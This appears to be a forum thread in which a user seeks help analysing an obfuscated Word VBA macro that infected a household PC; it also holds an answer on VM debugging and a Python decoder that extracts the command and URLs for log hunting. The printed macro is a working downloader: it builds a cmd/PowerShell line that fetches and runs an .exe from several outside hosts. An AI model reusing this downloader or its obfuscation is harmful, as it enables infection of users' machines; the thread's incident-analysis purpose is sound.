What is this VBA malware code trying to do?
My other half received a piece of malware in MS Word VBA. The document was opened, editing was enabled, and the trojan was somehow missed by the antivirus.
I'm 99% sure the system has been cleaned and there is no persistent effect, but I would like to understand what the code was trying to do so that I can be 100% sure.
I've tried to translate it, but it is beyond my abilities.
Here is the original VBA function:
Function BfXNd()
Dim nORTSq(3)
nORTSq(0) = Right(LCsbFFjF, 428)
nORTSq(1) = Left(JErht, 810)
nORTSq(2) = Mid(pjzflRs, 58, 796)
Dim rnMCEl(3)
rnMCEl(0) = Left(JErht, 810)
rnMCEl(1) = Mid(pjzflRs, 58, 796)
rnMCEl(2) = MidB(iOGKfiB, 537, 348)
Dim HXiIk(2)
HXiIk(0) = Left(JErht, 810)
HXiIk(1) = Mid(pjzflRs, 58, 796)
kRRCNwn = Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47)) + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^" + "4= ^ ^ ^ " + " ^ ^ ^ ^ ^ ^}^}^" + "{^h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^t^a" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^};^ka^" + "er^b;Bv^M$ ^met^I^-^e^k^" + "ovn^I^;)BvM^$^ ,iE^S^$(^e^li" + "^Fd^a^oln^w^oD.^W^W^Y${^y" + "r^t^{)" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "R" + "^w$ ni^ i^ES$(h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "aer^o^f" + "^;^'ex^e.'^+o^bV$+'^\'+" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^i" + "lbup:vne^$=^BvM^$;'68^9'^ =^ ^"
Dim WlsRmu(5)
WlsRmu(0) = MidB(iOGKfiB, 537, 348)
WlsRmu(1) = MidB(iOGKfiB, 537, 348)
WlsRmu(2) = Right(LCsbFFjF, 428)
WlsRmu(3) = Right(LCsbFFjF, 428)
WlsRmu(4) = Left(JErht, 810)
Dim ojijX(2)
ojijX(0) = MidB(iOGKfiB, 537, 348)
ojijX(1) = MidB(iOGKfiB, 537, 348)
Dim nHDNir(2)
nHDNir(0) = Mid(pjzflRs, 58, 796)
nHDNir(1) = Right(LCsbFFjF, 428)
jhcbfQ = "o^bV$;)'^@'(t^i^lpS.^'lk^U4^um" + "j4S/s^e^.ynnadrm//:" + "^p^tt^h^@JEVk5^m" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^W" + "/r^b.^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "i^pa//:^p^tt^h@^A^i1i^U" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^d^" + "I^Q/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^.^sn" + "o^it^u^lo^s-ah" + "sna^d//:^ptt^h@bu^A"
Dim tmiOA(5)
tmiOA(0) = MidB(iOGKfiB, 537, 348)
tmiOA(1) = Left(JErht, 810)
tmiOA(2) = Left(JErht, 810)
tmiOA(3) = Mid(pjzflRs, 58, 796)
tmiOA(4) = Mid(pjzflRs, 58, 796)
pHiJQ = "^q^HHT^M/m" + "o" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".^i^lam^p^us^ten//:^p^tth@z^" + "O^SdrnmX/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no^is^sa^" + "pmo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ht" + "i^a^f//:^p^t^th'^=" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "Rw^$;t" + "n^ei^l" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "^b^e^W^.teN" + " t" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e^jbo^-^wen=W^W" + "^Y$ lle^hsr^e^wo^p&&^f^or" + " /^L %^t ^in (^374;^-^1^;0)d^o" + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,"
Dim isfqZj(5)
isfqZj(0) = Left(JErht, 810)
isfqZj(1) = MidB(iOGKfiB, 537, 348)
isfqZj(2) = Mid(pjzflRs, 58, 796)
isfqZj(3) = MidB(iOGKfiB, 537, 348)
isfqZj(4) = Right(LCsbFFjF, 428)
Dim HCOVDH(2)
HCOVDH(0) = MidB(iOGKfiB, 537, 348)
HCOVDH(1) = Left(JErht, 810)
Dim YuAhz(5)
YuAhz(0) = Left(JErht, 810)
YuAhz(1) = Mid(pjzflRs, 58, 796)
YuAhz(2) = Right(LCsbFFjF, 428)
YuAhz(3) = Mid(pjzflRs, 58, 796)
YuAhz(4) = Mid(pjzflRs, 58, 796)
vflzlZjAjXX = "1!&&^i^f" + " %^t ^ls^s ^1 " + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^al^l " + "%^qhL:^~^5%" + Chr(Format(2 + 2 + 0 + 5 + 25)) + ""
BfXNd = kRRCNwn + jhcbfQ + pHiJQ + vflzlZjAjXX
Dim kmYzM(4)
kmYzM(0) = MidB(iOGKfiB, 537, 348)
kmYzM(1) = Mid(pjzflRs, 58, 796)
kmYzM(2) = Left(JErht, 810)
kmYzM(3) = Mid(pjzflRs, 58, 796)
Dim hNkzi(5)
hNkzi(0) = Mid(pjzflRs, 58, 796)
hNkzi(1) = Left(JErht, 810)
hNkzi(2) = Left(JErht, 810)
hNkzi(3) = Mid(pjzflRs, 58, 796)
hNkzi(4) = MidB(iOGKfiB, 537, 348)
End Function
This is encrypted code.
You can't tell what it is doing without running it far enough for it to decrypt itself.
When it runs, the strings are turned back into some kind of command, and at that point you can tell what it is trying to do.
If you want to examine it, spin up a Windows virtual machine (you can get them free from Microsoft), install Word, and step through the code with the debugger, which you reach from Word's menu.
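The answer above says you have to let it run before the string turns back into a command. For this particular sample that is not actually necessary, because BfXNd() does nothing but concatenate string literals and Chr(Format(sum)) characters, and the result is a cmd.exe one-liner whose only "encryption" is caret escaping plus a for /L loop that copies a variable backwards. The Python below is an added example (mine, not code from the question or from the answer): it evaluates those steps offline, with the four string statements from the posted macro embedded as input, and returns the command the loop would hand to cmd's call together with the URL list it carries, which is what you want for blocking and for hunting in proxy or DNS logs. It assumes (a) Chr(Format(n)) in VBA simply yields the character with code n, (b) cmd.exe drops a ^ and keeps the character after it, and (c) in a cmd /C context an undefined !qhL! is left as literal text on the first loop iteration, which is what the trailing %qhL:~5% exists to skip. Nothing from the sample is executed. What the macro does with the string BfXNd() returns is not in the posted function, so that part cannot be recovered from it.

```python
import re

# Sample input: the four string-building statements from the BfXNd() macro in the
# question, copied verbatim. The Dim/array lines in the macro are dead code and are
# omitted. The decoder below is an added example, not code from the question or answer.
VBA_PARTS = {
    "kRRCNwn": r'''Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47)) + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^" + "4= ^ ^ ^ " + " ^ ^ ^ ^ ^ ^}^}^" + "{^h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^t^a" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^};^ka^" + "er^b;Bv^M$ ^met^I^-^e^k^" + "ovn^I^;)BvM^$^ ,iE^S^$(^e^li" + "^Fd^a^oln^w^oD.^W^W^Y${^y" + "r^t^{)" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "R" + "^w$ ni^ i^ES$(h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "aer^o^f" + "^;^'ex^e.'^+o^bV$+'^\'+" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^i" + "lbup:vne^$=^BvM^$;'68^9'^ =^ ^"''',
    "jhcbfQ": r'''"o^bV$;)'^@'(t^i^lpS.^'lk^U4^um" + "j4S/s^e^.ynnadrm//:" + "^p^tt^h^@JEVk5^m" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^W" + "/r^b.^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "i^pa//:^p^tt^h@^A^i1i^U" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^d^" + "I^Q/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^.^sn" + "o^it^u^lo^s-ah" + "sna^d//:^ptt^h@bu^A"''',
    "pHiJQ": r'''"^q^HHT^M/m" + "o" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".^i^lam^p^us^ten//:^p^tth@z^" + "O^SdrnmX/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no^is^sa^" + "pmo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ht" + "i^a^f//:^p^t^th'^=" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "Rw^$;t" + "n^ei^l" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "^b^e^W^.teN" + " t" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e^jbo^-^wen=W^W" + "^Y$ lle^hsr^e^wo^p&&^f^or" + " /^L %^t ^in (^374;^-^1^;0)d^o" + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,"''',
    "vflzlZjAjXX": r'''"1!&&^i^f" + " %^t ^ls^s ^1 " + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^al^l " + "%^qhL:^~^5%" + Chr(Format(2 + 2 + 0 + 5 + 25)) + ""''',
}
# BfXNd = kRRCNwn + jhcbfQ + pHiJQ + vflzlZjAjXX
VBA_ORDER = ["kRRCNwn", "jhcbfQ", "pHiJQ", "vflzlZjAjXX"]

# A term is either a double-quoted literal or Chr(Format(a + b + ...)).
_TOKEN = re.compile(r'"([^"]*)"|Chr\(Format\(([^)]*)\)\)')


def eval_vba_concat(expr: str) -> str:
    """Statically evaluate a VBA expression built only from string literals and
    Chr(Format(a + b + ...)) terms joined with '+'. Format() renders the sum as a
    string and Chr() coerces it back to a number, so Chr(Format(99)) is "c"."""
    out = []
    for m in _TOKEN.finditer(expr):
        if m.group(1) is not None:
            out.append(m.group(1))
        else:
            out.append(chr(sum(int(n) for n in m.group(2).split("+"))))
    return "".join(out)


def strip_cmd_carets(s: str) -> str:
    """cmd.exe treats ^ as an escape: the caret is dropped and the following
    character is kept literally. The carets also make every %...% reference an
    undefined name, so nothing expands before the inner cmd.exe parses the line."""
    return re.sub(r"\^(.)", r"\1", s)


# Shape of the one-liner the macro builds: set SRC=<reversed payload>, then a
# for /L loop that copies SRC one character at a time, backwards, into ACC, then
# calls ACC minus its first N characters.
_REVERSE_LOOP = re.compile(
    r"set (?P<src>\w+)=(?P<val>.*?)&&for /L %(?P<t>\w) in "
    r"\((?P<start>-?\d+);(?P<step>-?\d+);(?P<end>-?\d+)\)do "
    r"set (?P<acc>\w+)=!(?P=acc)!!(?P=src):~%(?P=t),1!"
    r"&&if %(?P=t) lss 1 call %(?P=acc):~(?P<skip>\d+)%"
)


def emulate_reverse_loop(src: str, start: int, step: int, end: int, acc: str) -> str:
    """Emulate `for /L %t in (start;step;end) do set ACC=!ACC!!SRC:~%t,1!`.
    Assumption (cmd /C, not a batch file): an undefined !ACC! is left as literal
    text on the first iteration instead of expanding to nothing, so ACC starts
    with len(acc)+2 junk characters ("!qhL!" here); the trailing %ACC:~N% skips
    exactly those. Out-of-range offsets expand to the empty string."""
    value = None
    for t in range(start, end + step, step):
        prev = value if value is not None else f"!{acc}!"
        value = prev + (src[t] if 0 <= t < len(src) else "")
    return value


def decode_macro(parts=VBA_PARTS, order=VBA_ORDER) -> dict:
    """Run the three static steps and return the intermediate and final strings."""
    vba_result = "".join(eval_vba_concat(parts[name]) for name in order)
    cmd_line = strip_cmd_carets(vba_result)
    m = _REVERSE_LOOP.search(cmd_line)
    if m is None:
        raise ValueError("cmd line does not use the expected reverse-loop scheme")
    acc = emulate_reverse_loop(m["val"], int(m["start"]), int(m["step"]),
                               int(m["end"]), m["acc"])
    final = acc[int(m["skip"]):].strip()
    # The download list is a single '@'-joined string handed to .Split('@').
    url_list = re.search(r"'(http[^']*)'\.Split\('@'\)", final)
    return {
        "cmd_line": cmd_line,
        "final_command": final,
        "urls": url_list.group(1).split("@") if url_list else [],
    }


if __name__ == "__main__":
    result = decode_macro()
    print("cmd.exe line:", result["cmd_line"])
    print("final command:", result["final_command"])
    for url in result["urls"]:
        print("IoC:", url)
```

The three stages are returned separately so you can compare the cmd.exe line with what the VM debugger shows in the Immediate window, and the URL list is the part worth feeding to your proxy, DNS and firewall logs when checking whether the payload stage was ever reached.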